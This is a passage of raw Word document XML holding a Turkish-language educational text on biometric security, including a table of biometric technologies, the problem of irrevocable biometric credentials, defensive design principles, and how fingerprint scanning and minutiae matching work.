            </w:r>
          </w:p>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Eye scanning</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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Göz tarama)</w:t>
            </w:r>
          </w:p>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Vein patterns</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Damar desenleri)</w:t>
            </w:r>
          </w:p>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Facial recognition</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Yüz tanıma)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DNA matching  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(DNA eşleştirme)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hand geometry  (El geometrisi)</w:t>
            </w:r>
          </w:p>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Voice and speech recognition (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ses ve konuşma tanıma)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Signature analysis (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>İmza analizi)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Keystroke Dynamics (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tuş vuruş dinamiği)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E77DF4" w:rsidTr="009C4399">
        <w:trPr>
          <w:trHeight w:val="855"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Genotypic (Geneotipik)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E77DF4" w:rsidTr="009C4399">
        <w:trPr>
          <w:trHeight w:val="499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE39C3">
              <w:rPr>
                <w:rFonts w:cs="Minion-Regular"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Behavioral (Davranışsal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E77DF4" w:rsidRPr="00DE39C3" w:rsidRDefault="00E77DF4" w:rsidP="009C4399">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A0C2C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A0C2C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A0C2C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A0C2C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0C2C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Son olarak, karakteristik değiştirme sorunu var. Bir kişinin kredi kartı çalındığında, banka o kişiye yeni bir kart verir ve eskisini iptal eder. Bir bilgisayar </w:t>
      </w:r>
      <w:r w:rsidRPr="005A0C2C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kullanıcısı şifresini unuttuğunda, bir sistem yöneticisi eski şifreyi iptal edecek ve kullanıcıya yeni bir şifre atayacaktır. Bu iki işlemde, kimlik bilgilerinden ödün verildiğinde (kayıp veya hırsızlık nedeniyle), bazı otoriteler eski kimlik bilgilerini geçersiz kılar ve kullanıcıya yeni (ve farklı) bir tane verir. Ne yazık ki, biyometrik sistemler ile o kadar kolay değil. Bir insanın parmak izleri çalınmışsa, doktoru arayamaz ve yeni parmak alamaz! Ve estetik cerrahideki ilerlemelere rağmen, eski görüntünün riske atılmasından dolayı yeni bir yüz almak, normal (veya aklı başında) insanların çoğunun ulaşamayacağı bir yerdedir. Biyometrik sistemlerin kullanımı güvenlik açısından benzersiz zorluklar yaratır, çünkü sistemdeki verilerin uyuşması kurtarılamaz ve potansiyel olarak mağdur için felaket olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0C2C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometri tabanlı bir sistem için güvenliği tasarlarken, güvenlik uzmanı, uygulayıcının araç kutusundaki tüm araçları kullanmalıdır. Bu, derinlemesine savunma, güçlü erişim kontrolü, görevlerin ayrılması ve döndürülmesi ve sistemin hangi kısımlarına erişimi olanları kısıtlamak için en az ayrıcalık ilkesini uygulamak gibi zamana bağlı stratejileri içerir. Biyometrik sistemlerin kullanıcıları hakkında en kişisel bilgileri sakladığını ve bu nedenle güvenliklerine daha fazla dikkat edilmelerini gerektirdiğini unutmayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Biyometrik teknolojiler (Biometric Technologies)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Günümüzde mevcut olan farklı biyometrik teknolojiler, insanlarda bulunan üç tür biyometrik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> özellik arasında bölünebilir. Ek</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.1 en yaygın biyometrik teknolojileri ve bunların birbirleriyle ilişkilendirildiği özellik türlerini listele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r w:rsidRPr="005D2DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parmak izleri (Fingerprints)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parmak izleri, tanımlama ve doğrulama için en popüler ve en yaygın kullanılan biyometrik özelliktir. Parmak izleri fetal aşamada (yaklaşık beş ayda) oluşur ve bir insanın ömrü boyunca sabit kalır. İnsan parmağı, parmak uçlarının yüzeyinde çok sayıda sırt ve oluklar içerir. Parmaklarda cilt yağı veya amino asit birikintileri, baskıları belirli bir yüzeyde bırakır. Bu baskılar yüzeyden çıkarılabilir ve analiz edilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nasıl çalışır. Parmak izi tarama sistemlerinde, kullanıcı iki veya üç saniye boyunca bir posta pulu boyutunda küçük bir optik veya silikon yüzeye bir parmak yerleştirir. İki farklı parmak tarama teknolojisi vardır. Birincisi, parmağın görsel bir görüntüsünü kullanan bir optik tarama. İkincisi, bir parmağın görüntüsünü elektronik olarak yakalamak için üretilen bir elektrik alanı kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eşleşme </w:t>
      </w:r>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">noktaları. Her bir baskıdaki çıkıntılar ve oluklar analiz için çıkarılmıştır. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çıkıntı</w:t>
      </w:r>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oluk</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> desenleri dört gruba ayrılır: kemer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (arch)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (çok nadirdir), çadırlı kemer(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tented arch</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>düğüm</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(whorl)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ilmek</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(loop)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23D0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (en yaygın </w:t>
      </w:r>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olanı).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002262D0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir çizgi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sonlandığında</w:t>
      </w:r>
      <w:r w:rsidRPr="002262D0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ya da bölündüğünde, “minutia” olarak adlandırılır. Parmak izi benzersizliğini veren çıkıntıların, olukların ve minutia 'in kesin şekli ve yeridir. Avrupa mahkemelerinin çoğu olumlu bir eşleşme için 16 minutia, birkaç ülke ise daha fazlasına ihtiyaç duyuyor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002262D0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amerika Birleşik Devletleri'nde, bir parmak izi uzmanının ifadesi, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>minitia</w:t>
      </w:r>
      <w:r w:rsidRPr="002262D0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'in eşleşme sayısından bağımsız olarak yasal olarak bir eşleşme oluşturmak için yeterlidir, ancak ondan az eşleme noktasına dayanan bir eşleşme savunmadan güçlü bir itirazla karşı karşıya kalacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
